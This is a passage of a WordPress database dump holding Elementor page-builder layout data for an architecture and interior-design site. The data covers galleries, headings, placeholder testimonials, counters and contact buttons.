Gallery\",\"_id\":\"0a9343c\"}],\"columns\":3,\"aspect_ratio\":\"9:16\",\"thumbnail_image_size\":\"2048x2048\",\"show_all_galleries_label\":\"All\"},\"elements\":[],\"widgetType\":\"gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(3589,4832,'_elementor_page_assets','a:0:{}'),(3590,4832,'_elementor_pro_version','3.8.1'),(3591,4833,'_wp_page_template','elementor_header_footer'),(3592,4833,'_elementor_edit_mode','builder'),(3593,4833,'_elementor_template_type','wp-page'),(3594,4833,'_elementor_version','3.8.1'),(3595,4833,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"7d85101\",\"elType\":\"widget\",\"settings\":{\"orderby_post\":\"post_date\",\"order\":\"DESC\",\"show_category_empty\":\"\",\"template\":\"template2\",\"hide_desktop\":\"hidden-desktop\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\"},\"elements\":[],\"widgetType\":\"ova_elementor_project_filter\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b46d948\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d86197\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"fe2cde6\",\"elType\":\"widget\",\"settings\":{\"gallery\":[{\"id\":4825,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/commercial-1.jpg\"},{\"id\":4826,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/commercial-2.jpg\"},{\"id\":4827,\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/commercial-3.jpg\"}],\"galleries\":[{\"gallery_title\":\"New Gallery\",\"_id\":\"0a9343c\"}],\"columns\":3,\"aspect_ratio\":\"9:16\",\"thumbnail_image_size\":\"2048x2048\",\"show_all_galleries_label\":\"All\"},\"elements\":[],\"widgetType\":\"gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(3596,4833,'_elementor_page_assets','a:0:{}'),(3597,4833,'_elementor_pro_version','3.8.1'),(3600,3388,'_elementor_css','a:7:{s:4:\"time\";i:1694156273;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:5:\"empty\";i:0;s:0:\"\";s:3:\"css\";s:0:\"\";}'),(3601,4656,'_elementor_css','a:6:{s:4:\"time\";i:1694519149;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:8:\"fa-solid\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3602,4654,'_elementor_css','a:6:{s:4:\"time\";i:1694789585;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:8:\"fa-solid\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3603,4492,'_edit_lock','1695380521:2'),(3604,4613,'_elementor_css','a:7:{s:4:\"time\";i:1695058217;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:5:\"empty\";i:0;s:0:\"\";s:3:\"css\";s:0:\"\";}'),(3605,4836,'_wp_page_template','elementor_header_footer'),(3606,4836,'_elementor_edit_mode','builder'),(3607,4836,'_elementor_template_type','wp-page'),(3608,4836,'_elementor_version','3.8.1'),(3609,4836,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-get-to-know-us.jpg\",\"id\":710,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"REDESIGN LIFE\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">We believe that interior design is beyond aesthetic and function, it should represent personality and characteristic of a person. We capture the spirit, passion and taste of out client and apply them into design. Our brand spirit \\u2018\\u2019redesign life\\u2019\\u2019 is about giving major change to people\\u2019\\u2019s life and makes their home as inspiring place.<\\/span><\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"f3caa1a\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\"},\"elements\":[{\"id\":\"697046f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20},\"elements\":[{\"id\":\"4b2c591\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_element_width\":\"auto\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"_border_color\":\"#E3B25A\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"9b875c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":79.92,\"space_between_widgets\":10},\"elements\":[{\"id\":\"1150f91\",\"elType\":\"widget\",\"settings\":{\"title\":\"John Alan\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h3\",\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"23ae2ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"CO - FOUNDER\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e8e90de\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5b19198\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d460dea\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking about BauHaus\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"da0b416\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"11f956f\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"d232423\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#E3B25A\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8056628\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\",\"_id\":\"51a9c88\"}],\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9c560b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"63f0bcf\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9b446cc\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"94218cd\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9ac0b32\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"f80af3e\"}],\"background_item_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"-15\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"bounceInUp\",\"_animation_tablet\":\"none\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"dot_control\":\"yes\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges in deploying\\ninterior design applications\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or call: \",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"+ 1800-111-543 \",\"phone_address\":\"1800111543\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":6800},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Architectures\",\"number\":906,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Service providing\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy customers\",\"number\":9760,\"icon\":{\"value\":\"flaticon flaticon-satisfaction\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4388608\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b6b9eaa\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a2ebcc\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our Architects\",\"title\":\"Our expert team\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"9d2f9e3\",\"elType\":\"widget\",\"settings\":{\"info_background_background\":\"classic\",\"info_background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-lines-team.png\",\"id\":937,\"alt\":\"\",\"source\":\"library\"},\"info_background_position\":\"top right\",\"info_background_repeat\":\"no-repeat\",\"total_count\":6,\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_team\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7836724\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b90ed21\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b88a577\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01.png\",\"id\":752,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ad43d0d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"35d31c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02.png\",\"id\":753,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\"